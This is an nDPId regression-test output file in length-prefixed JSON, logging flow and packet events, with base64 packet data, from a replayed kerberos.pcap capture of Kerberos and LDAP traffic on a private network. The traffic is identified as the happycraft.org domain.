00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337930217,"pkt":"pB9ywglqAAgCHEeuCABFAADBAFlAAIAGkOysEAjJrBAICMAQAFhuA\/SQrSTVxVAYAQACWAAAqoGWMIGToAMCARKigYsEgYhFQhzXcnmj64Ly0uBtjkMUoTuM+x\/rpAOTUWDkUHAspBDcB8geScaOnqOyTgnIEt9ORSbyaLGh7aDpqWoX8LkoU9AsGNn4U6LRjikWi59PfjQn46P9BY0tn6JOEZn\/IKW+bzyhJYK72MU5dfE\/Y9v1QP4pOcMGsyTXEkOUPDq6y5KpwHUNPs1e"}
00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":1549337930217,"pkt":"AAgCHEeupB9ywglqCABFAACmE1FAAIAGfg+sEAgIrBAIyQBYwBCtJNt5bgP1KVAYAQC1BwAApQG9zo7oa2HyeKU61c2m29Ax+Ioczo4ZbPhC81jR0pDanr7lBKhJeMuGW\/uva7FyAslnHaJSlZ\/JCHVy9T8T0Ut1tj8cqy\/o\/YC+6XwQJV1\/l63dulAmK8KMVnuSbTDSVBQ5iahKxwLlZ8cbK3LMBirQeX8FcESDlzlIPsVQ"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930219,"flow_last_seen":1549337930219,"flow_idle_time":7440000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":1,"thread_ts_msec":1549337930219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00960{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1549337930219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":429,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":429,"pkt_l4_len":395,"thread_ts_msec":1549337930219,"pkt":"pB9ywglqAAgCHEeuCABFAAGfAF1AAIAGkAqsEAjJrBAICMANwANTRo4+sysn9FAYAQASVgAAOJsrJlDNtr7H4lcner+4Ya97utGtvfHqO\/A9pIIBWDCCAVSgAwIBEqKCAUsEggFHE7YBEd08uXxTAz9oATIBnzsu+CIXQ7IKgHphso5XWVrf1UwI0kS3bNe0YDIltyDk2xHWA\/s5Rnf1JAD5LdMYfWfRtly9XMnusGEqHhr+HUrsB70ut1E9AZfE9oDmCRiRKgSi\/yPqeUdMQ3mTdU1fxpZbOqOrcP2UxT7TverwRJibh+asJMQhC1cH82k0XRAktx95xJlXR3QKNE1DR8fsq9gq2Y16fmA9gsztPUDC4IkAL71ItK34puHol45q2g1+vM2umAkKTXGS4uZkIzxH5rv1eNIbWz6GtEw1jeT5kTsqyd\/cgQicx4yHy9VJKmfjweCCyOHHgJ0JONAYKLNrmUspunn\/qiNj30BsQPTsl8DziFoWtJvBGiR7UAPGmzNl3CewZOrjtG26JZPGTaTuBek+GwxKg7cb\/ze4riey9Wnfq0rUqdvf"}
00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1549337930219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":1549337930219,"pkt":"AAgCHEeupB9ywglqCABFAAFEE1VAAIAGfW2sEAgIrBAIycADwA2zKyf0U0aPtVAYAQCiqgAABQAMBxAAAAAcAagAAgAAANAW0BaHIgAABgA0OTE1NQADAAAAAgACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMFcXG6vjdJgxm12++czDYBAAAAAwADAAAAAAAAAAAAAAAAAAAAAAAAAAAACQYAAAAAAAChgaUwgaKgAwoBAaELBgkqhkiC9xIBAgKigY0EgYpvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbZHvDki757uIRa6348vky4CmSXJcuY8x7Y1L3GMPoboaFC4AmaVBuECBYLv9qMZx8MRhhEX3NAubRHjTv4BhutqH0onvuRNc5YNBgbuLmx\/PeM5pC\/bambRC96DP0B9XtGxHF5b6I04IhLGs2Ss="}
00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1549337930219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337930219,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAF5AAIAGkKSsEAjJrBAICMANwANTRo+1syspEFAYAP\/w8AAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBEJ\/MyGgG2X9jllu+ZB+MxLzLgKVhkidSZOf9UFj0HoVGhQSTvPAIV6ETXdthgzo7fJnzn1QgLAxGW+unJjrxZzV2yGjHgQcBAQE\/\/\/\/\/\/8AAAAAToOoIEtcH3O\/XLUOvcMURw=="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931189,"flow_last_seen":1549337931189,"flow_idle_time":7440000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931189,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1549337931189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1549337931189,"pkt":"pB9ywglqAAgCHEeuCABFAAEaAHBAAIAGkHysEAjJrBAICMARAYXGiPwnAgHw6FAYAQD72QAAHIAjHF8ymtjcD1VQuy4UgRChAu\/ekRMgcpsydbeCEgGc8O49XcEm2dIOQUYWz5jyNJ04mLjuLVb5JED7bXFEp0Ouk95kXWAsbhG+yaFiTruRiQNLefpIfBd02fAN9rH6kVBTVFVzTavxG5ZN46Q2CRurERdYtT07E7VAGTF+6yWhKn18+hUxFM5IXiI8jM4osfH687+lmO1gN\/3mr3cymHmPLwvBfLQ9P\/qJ62iSz72gALgVKjnTrFQYtji5UhDqTerpDdd7cbCpV4VyQehZ\/3jzwsKcVZtQElZtM7aiTvqbzIsK7RmP3EZFJoQ\/JIQyyhY="}
00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1549337931190,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337931190,"pkt":"AAgCHEeupB9ywglqCABFAAD6E2FAAIAGfausEAgIrBAIyQGFwBECAfDoxoj9GVAYAQDO8AAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1TTwhyAF9FVLbWTl8wTaD0aGMw9PDC0vNUorciel2CrkeZRTWRInWV74srNnVapF3vxPYDt7dvyfJVk888MzdKOasNrV1ijuwTfVJ0DIXj985iqAQmj9Mcte2ZOXgI6pFvWB0EEgpCluxB9enG"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931198,"flow_last_seen":1549337931198,"flow_idle_time":7440000,"flow_min_l4_payload_len":113,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":113,"midstream":1,"thread_ts_msec":1549337931198,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1549337931198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1549337931198,"pkt":"pB9ywglqAAgCHEeuCABFAACZAHRAAIAGkPmsEAjJrBAICMASAFgkNdEgXsLgdFAYAQB+8gAAMUMT6Lk9nd3l4g7meOnydVZeUkzRDUCNbnZ+O2nc5UtCJOGQV8MBRj2azOMjgxpQ1tcViooap1+TILjpjhURvLMTREvy8WPkAKcvtuPHKbLtQ3Ir7HNN6Ftdy+KwiOrOLvSrSyEtUhWZxA6KOnwca9s="}
00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1549337931199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1549337931199,"pkt":"AAgCHEeupB9ywglqCABFAABsE2VAAIAGfjWsEAgIrBAIyQBYwBJewuYoJDXRkVAYAQBPlQAA7mWAsz4LwR11oOSQ27Ex06YGG2bAP8ttVVXtAwxS755lCHRg4mUkpOjXnBJJ8KdHDkkp7LWBSVTLf+j0wkJ4hFVjx0c="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1549337931210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1549337931210,"pkt":"pB9ywglqAAgCHEeuCABFAAXAAHpAAIAGi8ysEAjJrBAICMATAFio5J72SB155lAYAQAvgAAAAAAFlGyCBZAwggWMoQMCAQWiAwIBDKOCBQcwggUDMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjkBvFbBksZRBZsgqvT9rWZWIMz104YLf86+Cksa0ZMsEGJ\/RDcCZOr8kPQRKlwzkm2uQjqkaOemu4sYhWXYr71KrOEs2JUveeWW4HHkLaYXd0a2yOtTAVV1zR76rPVw3Om2DZiy3OdOJiQuRn3tY6sCbzkX\/gKz0r0nI8miItgy4uzP0Z9rEEUiiCUR\/XkOkdTBzoAcDBQBAgQAAohAbDkhBUFBZQ1JBRlQuT1JHoycwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44sbqoEjAQAgESAgERAgEXAgEYAgL\/eQ=="}
00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}}
02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1549337931211,"pkt":"AAgCHEeupB9ywglqCABFAAXUE2tAAIAGeMesEAgIrBAIyQBYwBNIHXnmqOSkjlAYAQDmlQAAAAAFqG2CBaQwggWgoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIEOGGCBDQwggQwoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6OCA+wwggPooAMCARKhAwIBAaKCA9oEggPWM37115K3Hp8wZkASHyq+pZzCB52w4ZkoKvxkfuUu0LiaHFeH\/YmBkYuC+Y2vHUb50xj2RvlJ0VUIhZ76+RSlQ21W8ccYNaNUXAdabNdF58x1VLmlxuTxbWyuhApe3nart0yE2ggJlqq+SXunnCj4pybyo3D5UqYJsd2CPwW\/UrYMlNJN1gTQgtBaL+rVhNBO6KW9AYxQ1t3V4\/aN5W98Rm9mtqvqy8JlwwSbsqtA+fkgyuLhaFI64sFXeg2okoVY+WpiV8y69YH3VrH9iOYXgjNBApUv8XW3Inwsdd+FJTBLBvDWG4tGHW9DGxqpa+jzaFQyiDi46S1MFPNG5ax\/fXZRFVyIKm5Uvcg+IVoFoTv79M+o2izKZu3xW5GT3jmX5joC1Jz2cBBvfj31IPUawr97kChTt3baVrRO5jtj4Qe\/Yf9D1ea6AnOL3m9lXfbWlkiRMtogdbiLBmz40fY6y7s2fBoNzUM7PPtzjMCZD+mzFnuxbn6SKFsq1jRXr1gfhz99U\/sj4rpgf0fGzuAji6\/CldJydoJ3ZF35EbOHxlT67B0T5Wdz2DSGMxMFnFTU2y41IZZAFsQkozjJDlJyV\/H3UNEgpsuzFWCdn70SJWivzXQmU387\/5qoLQgDt1DzqhRxVq84eAlKWowli8llAVqtdeTmpgPePJrGuN8afpBvekjwt\/1CNWyg0EdZHQFfl1jlAEsgIyCski92E8xu8mvOhuDWTPYemtkOSb2FcxtoxHDyT\/GouX7ARs1ZykSB8j3R9t9ImA7xedyZ34sFfJFGRcLyx6qpTKqFmVZRuxhX4QxBOD\/ubH8xUJ\/p2KhM0jR1yUcK5cyCfymWcxTybrHYNySjaI0gUlhRAiWvZM8bRaCC8Fvoak+VMcqFAYw\/ve5dkR7KuJ\/TxqmhnlpwuoDkayoCpyiqZLALWWLzMuA+erM0osdjgnLPkazewgaOuGK+L14eoN40NcSEI4LVjIf3MizcDep1bu4x++f34uKnDRQCxEnEkfmry2Kt7UmB9dRWUyMnIhre\/LcHyWzVYKmQzK4jbAZGQz3E7SgAtaF8YpuFzK+wN7Al3\/bnw+mNGEv8UnWesnu6eYSeTafPkSExr0eHjyMGHylq1SYGRDikN47BEUJ9DRohxwo4GIbZJ4SlXZm2o1CyYrdjxESgLw7oBxv5ojM77+mqWLxxRYcXrNOO62jI7OC10ISrQjw9VRI73l6ie75xGP23mwgzTkWksp2AmXFXEibjsoWoxN\/dqkJ1paHMQ4D49jni4b2qEd7LE7wiCkMzEEz1wgpM028xFWhhGKaCASowggEmoAMCARKiggEdBIIBGXjHjK5feQ4HY+O2QW1CcrS7y98xjbx4G5\/F1UdYW0nRFrJ1ea7DBhGVKjGhvpNRa\/suoiAGgMaTxIusGGUQaAV3QBkZHI2P7w3S90dRv87TwzBiyLZFov6Iyju+rGIOEBeNij1u4+ieA37sl1WxkkeY5PDSqYQ0xi5dzSQDh1ZKJZF1swmboJUdCNAO5zs9II914vVd0a+gpHqPPfi\/aa\/2ENYesIfYc445XBAksieN4OCiUuXDZetEyUARPhuFnigdmrFcLiKa7lrUb+XOxw\/TpGzrNeFBj3QXNS06SOOdTL3pwlP77\/SR+78shwDam4sOlgv2UEV2H31TfNEKJs\/OC4Ks1WD8+3srLETa3NVngdje5im6AaSi"}
00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1064,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":1064,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAARQAIFAAIAGjTWsEAjJrBAICMAVAFjnnRKZiyMmn1AYAQD\/uwAADkhBUFBZQ1JBRlQuT1JHoicwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQGiggPaBIID1jN+9deStx6fMGZAEh8qvqWcwgedsOGZKCr8ZH7lLtC4mhxXh\/2JgZGLgvmNrx1G+dMY9kb5SdFVCIWe+vkUpUNtVvHHGDWjVFwHWmzXRefMdVS5pcbk8W1sroQKXt52q7dMhNoICZaqvkl7p5wo+Kcm8qNw+VKmCbHdgj8Fv1K2DJTSTdYE0ILQWi\/q1YTQTuilvQGMUNbd1eP2jeVvfEZvZrar6svCZcMEm7KrQPn5IMri4WhSOuLBV3oNqJKFWPlqYlfMuvWB91ax\/YjmF4IzQQKVL\/F1tyJ8LHXfhSUwSwbw1huLRh1vQxsaqWvo82hUMog4uOktTBTzRuWsf312URVciCpuVL3IPiFaBaE7+\/TPqNosymbt8VuRk945l+Y6AtSc9nAQb3499SD1GsK\/e5AoU7d22la0TuY7Y+EHv2H\/Q9XmugJzi95vZV321pZIkTLaIHW4iwZs+NH2Osu7NnwaDc1DOzz7c4zAmQ\/psxZ7sW5+kihbKtY0V69YH4c\/fVP7I+K6YH9Hxs7gI4uvwpXScnaCd2Rd+RGzh8ZU+uwdE+Vnc9g0hjMTBZxU1NsuNSGWQBbEJKM4yQ5Sclfx91DRIKbLsxVgnZ+9EiVor810JlN\/O\/+aqC0IA7dQ86oUcVavOHgJSlqMJYvJZQFarXXk5qYD3jyaxrjfGn6Qb3pI8Lf9QjVsoNBHWR0BX5dY5QBLICMgrJIvdhPMbvJrzobg1kz2HprZDkm9hXMbaMRw8k\/xqLl+wEbNWcpEgfI90fbfSJgO8Xncmd+LBXyRRkXC8seqqUyqhZlWUbsYV+EMQTg\/7mx\/MVCf6dioTNI0dclHCuXMgn8plnMU8m6x2Dcko2iNIFJYUQIlr2TPG0WggvBb6GpPlTHKhQGMP73uXZEeyrif08apoZ5acLqA5GsqAqcoqmSwC1li8zLgPnqzNKLHY4Jyz5Gs3sIGjrhivi9eHqDeNDXEhCOC1YyH9zIs3A3qdW7uMfvn9+Lipw0UAsRJxJH5q8tire1JgfXUVlMjJyIa3vy3B8ls1WCpkMyuI2wGRkM9xO0oALWhfGKbhcyvsDewJd\/258PpjRhL\/FJ1nrJ7unmEnk2nz5EhMa9Hh48jBh8patUmBkQ4pDeOwRFCfQ0aIccKOBiG2SeEpV2ZtqNQsmK3Y8REoC8O6Acb+aIzO+\/pqli8cUWHF6zTjutoyOzgtdCEq0I8PVUSO95eonu+cRj9t5sIM05FpLKdgJlxVxIm47KFqMTf3apCdaWhzEOA+PY54uG9qhHeyxO8IgpDMxBM9cIKTNNvMRVoYRg="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAAEaAINAAIAGkGmsEAjJrBAICMAUAYWVZlyUeqXAF1AYAQAMZQAAADzwgZ4odBCJHRYlGGakwQrZbcEXWu9XXnYRAfBS9UWuXk5Gs8yUHN3o80HZG8YpVlAE6+3ZtDtC+pUsrywDAW4RiWhUhsRgT1sEZ7Vtb++mdY4XtnskLm1\/a8GZzwfpptF0EbEM2x6OOlhhC6IhVJD1Y8p9M\/8ToLfUByDVk8u4C3VF8fyeQ0nd00U5YKsyBV8n8IUXdemUN+fgHev0R3Z+H9FwOZZ3xgduPU1Vapfbai\/N6Y9ZMkNd8RzvF1IldwQMemLuz0F0TTbyd784T8orT0ooc+nzAjFSSfg1FeelCx\/Q2\/iHKtSIZWhWBK\/UpxM="}
00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1549337931213,"pkt":"AAgCHEeupB9ywglqCABFAACwE3FAAIAGfeWsEAgIrBAIyQBYwBWLIyaf550WwVAYAQCWAgAAAAAAhH6BgTB\/oAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OVqlBQIDDJwypgMCAQ2pEBsOSEFQUFlDUkFGVC5PUkeqJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6wZBBcwFaEDAgEDog4EDLsAAMAAAAAAAwAAAA=="}
00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337931213,"pkt":"AAgCHEeupB9ywglqCABFAAD6E3RAAIAGfZisEAgIrBAIyQGFwBR6pcAXlWZdhlAYAQAZvwAAMIQAAADMAgEHYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG3yZsLFskNz2Tj8maOz7vLNMVSC3wBerc1xRFPj0GLDPGT9QlZRJav62bndhsIjLkgXNAdSqCa2GR8Luxe5TgJHZoIn44Is8Ku3wpqAc9pR3m8qLfoA6VkyZzzulSM2YJ4KniKJ4c7+rl